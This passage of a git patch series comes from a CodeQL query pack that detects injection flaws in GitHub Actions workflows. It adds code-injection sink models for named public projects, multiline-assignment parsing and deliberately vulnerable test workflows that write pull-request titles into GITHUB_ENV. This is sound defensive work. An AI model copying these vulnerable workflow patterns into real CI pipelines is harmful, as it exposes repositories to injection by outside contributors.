["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..9e5f6e3541e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml new file mode 100644 index 000000000000..89fbb5dbf700 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml new file mode 100644 index 000000000000..26f9f659a2d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file From 6c245605a754d5a43dafa11c4448b30a642e0d17 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:26:45 +0200 Subject: [PATCH 165/707] Discard already-modeled sinks --- ql/src/Security/CWE-020/CompositeActionsSinks.ql | 4 +++- ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 54f58e6b63ee..3ea9050c8322 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 2dd5bf1cfef5..5f1c54e70034 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -21,7 +21,9 @@ private module MyConfig implements DataFlow::ConfigSig { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + } } module MyFlow = TaintTracking::Global; From 1b2e02df64938e6edca0b98b0d34f86d094e4ab9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:18:09 +0200 Subject: [PATCH 166/707] Add support for multiline assigments --- ql/lib/codeql/actions/Ast.qll | 66 +++++++++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +++++++--- .../security/ArtifactPoisoningQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 58 +++++++++------- .../.github/workflows/multiline.yml | 29 ++++++++ ql/test/library-tests/test.ql | 4 +- .../CWE-077/.github/workflows/test4.yml | 43 ++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 6 ++ .../PrivilegedEnvVarInjection.expected | 8 +++ .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 +-- .../.github/workflows/artifactpoisoning51.yml | 4 -- .../.github/workflows/artifactpoisoning52.yml | 27 ++++++++ .../.github/workflows/artifactpoisoning53.yml | 27 ++++++++ .../CWE-829/ArtifactPoisoning.expected | 2 + 15 files changed, 265 insertions(+), 56 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bbf5c86fb957..cf5b63399f0a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -25,14 +25,17 @@ module Utils { } bindingset[line, var] - predicate extractAssignment(string line, string var, string key, string value) { + private predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | + // single line assignment assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and key = trimQuotes(assignment.splitAt("=", 0)) and value = trimQuotes(assignment.splitAt("=", 1)) or + // workflow command assignment assignment = line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and @@ -41,20 +44,59 @@ module Utils { ) } - predicate writeToGitHubEnv(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) + bindingset[var] + private string multilineAssignmentRegex(string var) { + result = + ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[var] + private string multilineBlockAssignmentRegex(string var) { + result = + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" + } + + bindingset[script, var] + private predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + } + + predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) } predicate writeToGitHubOutput(Run run, string key, string value) { - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", key, value) - ) + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b95..48c40b6a72c7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,19 +36,36 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - exists(string script, string line | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "OUTPUT", output, _) and - line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | + run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and succ.asExpr() = run ) } +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c192974a12b6..4a334f3440f8 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -250,7 +250,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // eg: `echo "sha=$(> $GITHUB_ENV` Utils::writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index d216707ec861..edeea61a8713 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -5,35 +5,47 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -class EnvVarInjectionFromExprSink extends DataFlow::Node { - EnvVarInjectionFromExprSink() { - exists(Expression expr, Run run, string script, string line, string key, string value | - script = run.getScript() and - line = script.splitAt("\n") and - Utils::extractAssignment(line, "ENV", key, value) and - expr = this.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) - } +predicate envVarInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string key, string value | + Utils::writeToGitHubEnv(run, key, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) } -class EnvVarInjectionFromFileSink extends DataFlow::Node { - EnvVarInjectionFromFileSink() { - exists(Run run, ArtifactDownloadStep step, string value | - this.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) - } +predicate envVarInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, ArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a new env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + */ +predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varName, string value | + sink.asExpr().getInScopeEnvVarExpr(varName) = expr and + run = sink.asExpr() and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - this instanceof EnvVarInjectionFromExprSink or - this instanceof EnvVarInjectionFromFileSink or + envVarInjectionFromExprSink(this) or + envVarInjectionFromFileSink(this) or + envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml new file mode 100644 index 000000000000..04468cb15a1d --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -0,0 +1,29 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 947757c8c3a4..fa6c430e3663 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -80,7 +80,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractAssignment(t, "ENV", key, value) + Utils::extractLineAssignment(t, "ENV", key, value) ) } @@ -98,6 +98,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractAssignment(t, "OUTPUT", key, value) + Utils::extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 000000000000..7fb89591b116 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -0,0 +1,43 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cbb..32379a7264f7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,5 +14,9 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c936..77db4c10344d 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -3,6 +3,8 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -12,6 +14,10 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -19,3 +25,5 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | +| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index a300f4dd11ea..bf515674d903 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f025d13b1a9e..6ba7a1c714ae 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -200,8 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -309,8 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 